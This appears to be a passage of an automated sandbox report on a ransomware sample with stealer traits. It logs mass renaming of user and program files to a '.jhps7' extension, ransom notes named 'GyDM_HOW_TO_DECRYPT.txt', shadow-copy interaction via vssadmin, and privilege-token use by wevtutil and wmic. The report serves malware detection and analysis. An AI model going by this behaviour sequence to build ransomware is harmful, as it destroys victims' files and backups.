File renamed C:\Users\Admin\Pictures\BackupResolve.png => C:\Users\Admin\Pictures\BackupResolve.png.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_y2N5f24_dPY0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\InstallConvertTo.raw => C:\Users\Admin\Pictures\InstallConvertTo.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_7hzro7Q_Jgc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\JoinDeny.crw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_fHsSQzf8TFE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\PushRemove.tiff => C:\Users\Admin\Pictures\PushRemove.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_LVhpq22wIcI0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\WatchSet.tiff => C:\Users\Admin\Pictures\WatchSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_e9ChL9xkWJw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\WatchSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_e9ChL9xkWJw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\JoinDeny.crw => C:\Users\Admin\Pictures\JoinDeny.crw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_fHsSQzf8TFE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\MeasureStep.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_AvZhcYsoiGc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\ResolveExit.tiff => C:\Users\Admin\Pictures\ResolveExit.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_kUGuFCNodDQ0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResolveExit.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_kUGuFCNodDQ0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnlockCheckpoint.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_oiyuzWfHDQ00.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompleteRestart.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xHtzVD_jhqw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\MeasureStep.raw => C:\Users\Admin\Pictures\MeasureStep.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_AvZhcYsoiGc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\PushRemove.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_LVhpq22wIcI0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\UnlockCheckpoint.tiff => C:\Users\Admin\Pictures\UnlockCheckpoint.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_oiyuzWfHDQ00.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\StopSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_aRZbXqUHaHk0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\BackupResolve.png.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_y2N5f24_dPY0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\CompleteRestart.tiff => C:\Users\Admin\Pictures\CompleteRestart.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xHtzVD_jhqw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\InstallConvertTo.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_7hzro7Q_Jgc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\StopSet.tiff => C:\Users\Admin\Pictures\StopSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_aRZbXqUHaHk0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\7-Zip\7z.sfx.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_6U2TucaWhHQ0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xH0qJspj4Fo0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_slAnsTm2zaY0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_IE19xpdflrg0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_KvGxR9Ny_tE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\SKY.INF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_50S4_2GKpi40.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02743G.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_ietfb4yDpf40.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_qPenILcwkEc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SUBMIT.JS.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8r8n7O2vh5I0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\calendar.html C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_Ot4-BRBpVOw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBENDF98.CHM.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_tYNE5h156iE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01785_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_ejDkUpNb-uE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Clarity.thmx.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_6Xe4PVKgUZs0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.bmp C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_docked.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_CKOnfQsRD000.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_H8_ysH1OV5c0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_nOawPqpkPdI0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_HJpgra2PKGw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_YZXiE3xprXI0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD09664_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_PoFgODea85Y0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0240695.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_3oHjEzreFvY0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0336075.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_DD1FktKFpq40.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_JGFJtpgVJ8Q0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\gadget.xml C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_tDatXFn3nMs0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00608_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_wVoQVlsauuA0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-3.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\GyDM_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcer.dll.mui C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115865.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8RTeLd2R-f40.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Windows Media Player\fr-FR\wmpnetwk.exe.mui C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099181.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_quaHYc52ueQ0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_disable.gif.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_14QF-F3brxE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\GyDM_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02446_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_JGoscHH3fdE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL044.XML.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_Ajgo8utBdCc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ko.txt.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_MOlglUL-oY40.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msdaprsr.dll.mui C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090777.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_MwbOO68tbHo0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\de-DE\Solitaire.exe.mui.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_SYlWSGO4sU00.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239953.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8DKzi95OH_Y0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_2TyluNyOAXs0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5F.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_E3nas5TA5u80.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\GyDM_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_4IrIjFVxFd80.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099205.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_NrLVH77nBoc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105230.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_lmfOb2-shGk0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14844_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_dwiuYnFxHdY0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21340_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_l3ZfTuzQV9k0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_dChs6bXxbhw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_9v9J0tGUQx00.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_UUamuYI-GU80.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\js\calendar.js C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_1dQCooE08es0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
